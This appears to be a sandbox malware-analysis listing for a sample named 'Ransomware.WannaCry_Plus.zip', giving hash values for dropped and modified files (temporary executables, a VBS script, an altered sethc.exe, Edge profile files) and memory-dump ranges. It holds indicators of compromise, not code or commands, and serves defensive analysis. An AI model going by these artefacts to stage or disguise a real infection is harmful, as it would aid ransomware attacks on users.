C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4bfc48304f7875617af34a28e0877089 |
| SHA1 | 890c69a3ce0ef30eee40d15be115d22de7cd4cde |
| SHA256 | 401779c0dbab31191ac3b94fe68ec997f567b6b4f2259abf9596eb4a716b4daf |
| SHA512 | e74d6786a503f325330c32a916336f31fd99b6620e1e663213a743f0d9eca43056661233a51f6da4b12613fe4dc03ec041e67233fa2c6e79f734b23582258c88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7a6b272923111cd5ed7c602a5361aafb |
| SHA1 | f90d5fecc31aefab50e11a15d26b82d2c0ac603e |
| SHA256 | 79b8b429631aa2c3f8c94d1f1aae7a2e821d2ff8f96f0f5ba7225e5d6f0421fd |
| SHA512 | e7e59aa183dfca972babe32a83f3cec195cca6c9097134e6001fc47b883a44fd02dfbdb0d575d9d4e6ce1390eb06a4a188e29a5adde851256fc2c093b833a643 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4b3a4b34ce38c6e6f1427e62fcda5195 |
| SHA1 | d19e32ca2a4ec5a7359442206a358d6abac4c8c5 |
| SHA256 | 8fe402ac05b352fbeb511644c9a7d62a9fff30ad88a6366366a518c2ab665a1d |
| SHA512 | d8386a0e35aed1d6aa464e9a8952e20748f814266e307f7cfff0cf36b7c1c0ac9bb7f200f08c3c50bc9be8f120990b630e96729064224386cf7ab2f919fdaf9c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2dbce74ba3f68573a2dcdae6cb61b6ef |
| SHA1 | c2b358514fbfb9bcd5690a832e5197d3a8cdf345 |
| SHA256 | 41477e3fd14f8f68d086876f394345f0dfeceec224116af86c6fadcc3582855b |
| SHA512 | 3fa95a69a857831cb3281022f13627dbffa984c9a6156280ad0d96bda2753bcd7285f5bf5d22ba30b5bb61a999b2b11ef4d18733e3d4d5c5ecc1d4b2b5fef1d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ac24d02a369602afb1ccbba2c19ed778 |
| SHA1 | d89e866057ea5341092bfa801a745fa533ad82f1 |
| SHA256 | e7a978f6dd6c4ceb15ec49343806fc67d34a163a0cbaead37abf1179d7f65abd |
| SHA512 | 4f953dccf49190377b3a527f9f1ec58fb562befc57342a0e8fccc85de8794857b5865d5fef212177b6f2137e4b8e4cf81246a55c4c3c1bbb04a311c2c44bbb0a |
C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip
| MD5 | 5641d280a62b66943bf2d05a72a972c7 |
| SHA1 | c857f1162c316a25eeff6116e249a97b59538585 |
| SHA256 | ab14c3f5741c06ad40632447b2fc10662d151afb32066a507aab4ec866ffd488 |
| SHA512 | 0633bc32fa6d31b4c6f04171002ad5da6bb83571b9766e5c8d81002037b4bc96e86eb059d35cf5ce17a1a75767461ba5ac0a89267c3d0e5ce165719ca2af1752 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e185ce27b594f05a167afadf2724b852 |
| SHA1 | 9b7e1e37cdebd8149195575c682215ee48a93146 |
| SHA256 | 19655c895624421bd980e1f295ad38605a16702c3a8b65cffc01f9d1008b7474 |
| SHA512 | 8ae9ad5cc7c0ba49097d1975abc056a4c8ac4b69033e63aebde47d91d8667a0a35726fc9b428ac4e2b7f555d191e5b1e3190e60db1dfe8e9b95806aec7ecef07 |
C:\Windows\Temp\SDIAG_d0272f27-eafc-49c7-8ca1-b1108dacb20f\en-US\DiagPackage.dll.mui
| MD5 | d7309f9b759ccb83b676420b4bde0182 |
| SHA1 | 641ad24a420e2774a75168aaf1e990fca240e348 |
| SHA256 | 51d06affd4db0e4b37d35d0e85b8209d5fab741904e8d03df1a27a0be102324f |
| SHA512 | 7284f2d48e1747bbc97a1dab91fb57ff659ed9a05b3fa78a7def733e809c15834c15912102f03a81019261431e9ed3c110fd96539c9628c55653e7ac21d8478d |
C:\Windows\Temp\SDIAG_d0272f27-eafc-49c7-8ca1-b1108dacb20f\DiagPackage.dll
| MD5 | 79134a74dd0f019af67d9498192f5652 |
| SHA1 | 90235b521e92e600d189d75f7f733c4bda02c027 |
| SHA256 | 9d6e3ed51893661dfe5a98557f5e7e255bbe223e3403a42aa44ea563098c947e |
| SHA512 | 1627d3abe3a54478c131f664f43c8e91dc5d2f2f7ddc049bc30dfa065eee329ed93edd73c9b93cf07bed997f43d58842333b3678e61aceac391fbe171d8461a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7f99a83a302501395986b3ddd59a6c74 |
| SHA1 | 95e3a1bb86b3d402833aed653282896d59fad3c9 |
| SHA256 | 20a5ca093372bf8de6c9ce8f80ab163d66d009864018f720c6f1b5b79f14a5a5 |
| SHA512 | 773c9ea839870bd6b329c3562b201e6b088f66025fe9c65ab1e561587fab4d3798d5d3c59c8f20b8060ffb1fcd766168c5f83e12a81c38d78eb090570f96eda1 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qs5wsn25.sbe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/7248-8170-0x0000021D614F0000-0x0000021D61512000-memory.dmp
memory/7248-8178-0x0000021D79A10000-0x0000021D79A18000-memory.dmp
memory/7248-8187-0x0000021D79C80000-0x0000021D79C88000-memory.dmp
memory/7248-8196-0x0000021D79EF0000-0x0000021D79EF8000-memory.dmp
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\733862231\2024100712.000\PCW.debugreport.xml
| MD5 | 344b555af02562fe28dc861f083fad68 |
| SHA1 | 513f4810eaa4a9bf8ed93c6f9f877bc98b3f0d61 |
| SHA256 | 65dfe4ca9c19a464dbacfe238663f736da0e30a33d7934ba696cb73433592176 |
| SHA512 | b93cb164d3775701a108d9394a01eb78820d48ea791bcfb5e38a6b30fb490736bf64500ef92b67540c9f82a9aca8e4e9e70ede1db8253b669b4c771f230c894c |
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\733862231\2024100712.000\results.xsl
| MD5 | 310e1da2344ba6ca96666fb639840ea9 |
| SHA1 | e8694edf9ee68782aa1de05470b884cc1a0e1ded |
| SHA256 | 67401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c |
| SHA512 | 62ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 85be4989c5fbd83144800b0f00115680 |
| SHA1 | 2a5c130e0da1841cd123e2923b5794bd3b2ce652 |
| SHA256 | 8b42fb4d70d3be9ecd8a0e5c6cd387d633baf63d3166f6876b478ca47934609f |
| SHA512 | 2e00c76616c8d9c62cca646d543c152c5a68757b53d9f9b0d24c39dcf64a404a556e1e52e677fcf90d2ae49830d3c90063eddd67f536fb11b5d9d8e89015ed3c |
C:\Program Files\MicrosoftWindowsServicesEtc\GetReady.exe
| MD5 | 57f3795953dafa8b5e2b24ba5bfad87f |
| SHA1 | 47719bd600e7527c355dbdb053e3936379d1b405 |
| SHA256 | 5319958efc38ea81f61854eb9f6c8aee32394d4389e52fe5c1f7f7ef6b261725 |
| SHA512 | 172006e8deed2766e7fa71e34182b5539309ec8c2ac5f63285724ef8f59864e1159c618c0914eb05692df721794eb4726757b2ccf576f0c78a6567d807cbfb98 |
C:\Program Files\MicrosoftWindowsServicesEtc\example.txt
| MD5 | 8837818893ce61b6730dd8a83d625890 |
| SHA1 | a9d71d6d6d0c262d41a60b6733fb23cd7b8c7614 |
| SHA256 | cc6d0f847fde710096b01abf905c037594ff4afae6e68a8b6af0cc59543e29bb |
| SHA512 | 6f17d46098e3c56070ced4171d4c3a0785463d92db5f703b56b250ab8615bcb6e504d4c5a74d05308a62ea36ae31bc29850187943b54add2b50422fb03125516 |
C:\Users\Admin\AppData\Local\Temp\xRun.vbs
| MD5 | 26ec8d73e3f6c1e196cc6e3713b9a89f |
| SHA1 | cb2266f3ecfef4d59bd12d7f117c2327eb9c55fa |
| SHA256 | ed588fa361979f7f9c6dbb4e6a1ae6e075f2db8d79ea6ca2007ba8e3423671b0 |
| SHA512 | 2b3ad279f1cdc2a5b05073116c71d79e190bfa407da09d8268d56ac2a0c4cc0c31161a251686ac67468d0ba329c302a301c542c22744d9e3a3f5e7ffd2b51195 |
C:\Users\Admin\AppData\Local\Temp\runner32s.exe
| MD5 | 87815289b110cf33af8af1decf9ff2e9 |
| SHA1 | 09024f9ec9464f56b7e6c61bdd31d7044bdf4795 |
| SHA256 | a97ea879e2b51972aa0ba46a19ad4363d876ac035502a2ed2df27db522bc6ac4 |
| SHA512 | 8d9024507fa83f578b375c86f38970177313ec3dd9fae794b6e7f739e84fa047a9ef56bf190f6f131d0c7c5e280e729208848b152b3ca492a54af2b18e70f5dc |
C:\Users\Admin\AppData\Local\Temp\thetruth.jpg
| MD5 | 7907845316bdbd32200b82944d752d9c |
| SHA1 | 1e5c37db25964c5dd05f4dce392533a838a722a9 |
| SHA256 | 4e3baea3d98c479951f9ea02e588a3b98b1975055c1dfdf67af4de6e7b41e476 |
| SHA512 | 72a64fab025928d60174d067990c35caa3bb6dadacf9c66e5629ee466016bc8495e71bed218e502f6bde61623e0819485459f25f3f82836e632a52727335c0a0 |
C:\Users\Admin\AppData\Local\Temp\eula32.exe
| MD5 | cbc127fb8db087485068044b966c76e8 |
| SHA1 | d02451bd20b77664ce27d39313e218ab9a9fdbf9 |
| SHA256 | c5704419b3eec34fb133cf2509d12492febdcb8831efa1ab014edeac83f538d9 |
| SHA512 | 200ee39287f056b504cc23beb1b301a88b183a3806b023d936a2d44a31bbfd08854f6776082d4f7e2232c3d2f606cd5d8229591ecdc86a2bbcfd970a1ee33d41 |
memory/7288-8453-0x0000000000E50000-0x0000000000F8C000-memory.dmp
memory/7288-8454-0x00000000060A0000-0x0000000006644000-memory.dmp
memory/7288-8455-0x00000000059B0000-0x0000000005A42000-memory.dmp
memory/7288-8456-0x0000000003630000-0x000000000363A000-memory.dmp
C:\Windows\System32\sethc.exe
| MD5 | bcb0ac4822de8aeb86ea8a83cd74d7ca |
| SHA1 | 8e2b702450f91dde3c085d902c09dd265368112e |
| SHA256 | 5eafebd52fbf6d0e8abd0cc9bf42d36e5b6e4d85b8ebe59f61c9f2d6dccc65e4 |
| SHA512 | b73647a59eeb92f95c4d7519432ce40ce9014b292b9eb1ed6a809cca30864527c2c827fe49c285bb69984f33469704424edca526f9dff05a6244b33424df01d1 |
C:\Program Files\MicrosoftWindowsServicesEtc\NotMuch.exe
| MD5 | 87a43b15969dc083a0d7e2ef73ee4dd1 |
| SHA1 | 657c7ff7e3f325bcbc88db9499b12c636d564a5f |
| SHA256 | cf830a2d66d3ffe51341de9e62c939b2bb68583afbc926ddc7818c3a71e80ebb |
| SHA512 | 8a02d24f5dab33cdaf768bca0d7a1e3ea75ad515747ccca8ee9f7ffc6f93e8f392ab377f7c2efa5d79cc0b599750fd591358a557f074f3ce9170283ab5b786a1 |
memory/7444-8487-0x00000000006D0000-0x00000000006F4000-memory.dmp
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\sessionCheckpoints.json.tmp
| MD5 | 29ce37dc02c78bbe2e5284d350fae004 |
| SHA1 | bab97d5908ea6592aef6b46cee1ded6f34693fa2 |
| SHA256 | 1bfee61e2f346959c53aa41add4b02d2b05c86c9f19ffefe1018f4a964bf4693 |
| SHA512 | 53a9eb746e193c088210d8eaa6218d988f3a67ee4cb21844d682ff0178db040932404f5ce2f3cf8b4576313ba0ec33c04ca288c3412bfa5df7dd8230cc2068bb |